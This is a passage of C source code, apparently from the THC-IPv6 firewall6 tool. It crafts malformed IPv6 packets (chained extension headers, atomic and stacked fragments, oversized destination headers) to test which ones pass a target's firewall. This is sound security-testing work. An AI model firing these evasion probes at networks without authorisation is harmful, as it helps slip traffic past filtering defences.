8; nxt = 40; } if (udp == 0 && ptr[nxt] == NXT_TCP && memcmp(dst, ptr + 8, 16) == 0 && len >= 60 + offset) { rsport = ptr[40 + offset] * 256 + ptr[41 + offset]; rdport = ptr[42 + offset] * 256 + ptr[43 + offset]; //printf("rsport: %d, rdport: %d, sport %d, port %d, count %d\n", rsport, rdport, sport, port, count); if ((is_srcport == 1 || rdport == sport + count) && rsport == port) { if (do_hop) printf("[%d] ", ptr[7]); printf("TCP"); if ((ptr[53 + offset] & 1) > 0) printf("-FIN"); if ((ptr[53 + offset] & 2) > 0) printf("-SYN"); if ((ptr[53 + offset] & 4) > 0) printf("-RST"); if ((ptr[53 + offset] & 16) > 0) printf("-ACK"); printf(" received\n"); matched = 1; } // else printf("DEBUG: different tcp pkt seen from target (is_srcport %d, rdport %d == sport %d + count %d, rsport %d == port %d)\n", is_srcport, rdport, sport, count, rsport, port); } if (udp == 1 && ptr[nxt] == NXT_UDP && memcmp(dst, ptr + 8, 16) == 0 && len >= 48 + offset) { rsport = ptr[40 + offset] * 256 + ptr[41 + offset]; rdport = ptr[42 + offset] * 256 + ptr[43 + offset]; if ((is_srcport == 1 || rdport == sport + count) && rsport == port) { if (do_hop) printf("[%d] ", ptr[7]); printf("UDP received\n"); } } if (ptr[nxt] == NXT_ICMP6 && (ptr[40 + offset] == ICMP6_UNREACH || ptr[40 + offset] == ICMP6_PARAMPROB) && len >= 96 + poffset + offset) { if (memcmp(dst, ptr + 72 + offset, 16) != 0) return; if (ptype >= 0) { if (ptype == NXT_FRAG && poffset == 0) { if (ptr[54 + offset] != NXT_FRAG && ptr[54 + offset] != NXT_DST) return; } else { if (ptr[54 + offset] != ptype) return; if (udp == 0 && ptr[54 + poffset2 + offset] != NXT_TCP) return; if (udp == 1 && ptr[54 + poffset2 + offset] != NXT_UDP) return; } } else { if (udp == 0 && ptr[54 + offset] != NXT_TCP) return; if (udp == 1 && ptr[54 + offset] != NXT_UDP) return; } rsport = ptr[88 + poffset + offset] * 256 + ptr[89 + poffset + offset]; rdport = ptr[90 + poffset + offset] * 256 + ptr[91 + poffset + offset]; if ((ptype == NXT_FRAG && poffset == 0) || ((rsport == sport + count || is_srcport == 1) && rdport == port)) { matched = 1; if (do_hop) printf("[%d] ", ptr[7]); printf("ICMPv6 "); if (ptr[40 + offset] == ICMP6_PARAMPROB) { printf("Parameter Problem received\n"); return; } switch(ptr[41 + offset]) { case 0: printf("Route"); break; case 1: printf("Firewall"); break; case 2: printf("Out-Of-Scope"); break; case 3: printf("Address"); break; case 4: printf("Port"); break; case 5: printf("Ingress/Egress"); break; case 6: printf("Reject"); break; default: printf("unknown"); } printf(" unreachable received\n"); } } else if (ptr[nxt] == NXT_ICMP6 && ptr[40 + offset] == ICMP6_ECHOREPLY && pingtest) { matched = 1; if (do_hop) printf("[%d] ", ptr[7]); printf("ICMPv6 Echo Reply"); } } void check_for_reply() { int ret = -1; time_t t; t = time(NULL); matched = 0; while (ret < 0) { usleep(10); thc_pcap_check(p, (char *) check_packet, NULL); if (matched == -1) { ret = -1; matched = 0; } else if (matched == 1) ret = 0; if (time(NULL) > t + 3 && ret < 0) ret = 0; } if (matched == 0) printf("FAILED - no reply\n"); else if (only == 0) sleep(1); } int main(int argc, char *argv[]) { int i, curr = 0; unsigned char buf[3000], ch; unsigned char *src, string[64] = "ip6 and not src "; unsigned char *srcmac = NULL, *dstmac = NULL; thc_ipv6_hdr *hdr, *hdr3; int offset = 14; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0; char *interface; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "uH")) >= 0) { switch (i) { case 'u': udp = 1; break; case 'H': do_hop = 1; break; default: fprintf(stderr, "Error: invalid option -%c\n", i); exit(-1); } } if (argc - optind < 3) help(argv[0]); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; dst = thc_resolve6(argv[optind + 1]); port = atoi(argv[optind + 2]); if (argc - optind > 3 && argv[optind + 3] != NULL) only = atoi(argv[optind + 3]); if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } srcmac = thc_get_own_mac(interface); if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); strcat(string, thc_ipv62notation(src)); memset(buf, 0, sizeof(buf)); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } printf("Starting firewall6: mode %s against %s port %d\n", udp == 0 ? "TCP" : "UDP", argv[optind + 1], port); printf("Run a sniffer behind the firewall to see what passes through\n\n"); curr = 0; /* ----------------- BEGIN OF TEST CASES ---------------- */ if (only == ++count || only == 0) { printf("Test %2d: plain sending\t\t\t", count); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: plain sending with data\t", count); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 1000) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 1000) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: IPv4 ethernet type\t\t", count); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; if (do_hdr_size) { if (do_pppoe) { hdr->pkt[20 + do_hdr_off] = 0; // PPP protocol value for IPv4 hdr->pkt[21 + do_hdr_off] = 0x21; } else if (do_hdr_vlan && do_6in4 == 0) { hdr->pkt[16] = 8; // ethernet protocol value for IPv4 hdr->pkt[17] = 0; } } else { hdr->pkt[12] = 8; // ethernet protocol value for IPv4 hdr->pkt[13] = 0; } if (do_6in4 == 0) { while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); } else printf("skipped (6in4)\n"); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: hop-by-hop hdr (ignore option)\t", count); poffset = 8; ptype = NXT_HBH; poffset2 = 34; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 6); if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: dst hdr (ignore option)\t", count); poffset = 8; ptype = NXT_DST; poffset2 = 34; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 6); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: hop-by-hop hdr router alert\t", count); poffset = 8; ptype = NXT_HBH; poffset2 = 34; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 6); buf[0] = 5; buf[1] = 2; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 3x dst hdr (ignore option)\t", count); poffset = 3 * 8; ptype = NXT_DST; poffset2 = 34 + 2*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 6); for (i = 0; i < 3; i++) if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 130x dst hdr (ignore option)\t", count); poffset = 130 * 8; ptype = NXT_DST; poffset2 = 34 + 129 * 8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 6); for (i = 0; i < 130; i++) if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: atomic fragment\t\t", count); poffset = 8; ptype = NXT_FRAG; poffset2 = 34; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2x atomic fragment (same id)\t", count); poffset = 2 * 8; ptype = NXT_FRAG; poffset2 = 34 + 1*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 2; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2x atomic fragment (diff id)\t", count); poffset = 2 * 8; ptype = NXT_FRAG; poffset2 = 34 + 1*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 2; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count*512 + i) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 3x atomic fragment (same id)\t", count); poffset = 3 * 8; ptype = NXT_FRAG; poffset2 = 34 + 2*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 3; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 3x atomic fragment (diff id)\t", count); poffset = 3 * 8; ptype = NXT_FRAG; poffset2 = 34 + 2*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 3; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count*512 + i) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 130x atomic fragment (same id)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 130; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 130x atomic fragment (diff id)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 130; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count*512 + i) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 260x atomic fragment (same id)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 260; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_FRAG, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_FRAG, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 260x atomic fragment (diff id)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 260; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count*512 + i) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_FRAG, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_FRAG, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2kb dst hdr\t\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2kb dst + dst hdr\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 32x 2kb dst hdr\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); for (i = 0; i < 32; i++) if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2x dst hdr + 2x frag\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 4x dst hdr + 3x frag\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type first+middle\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, 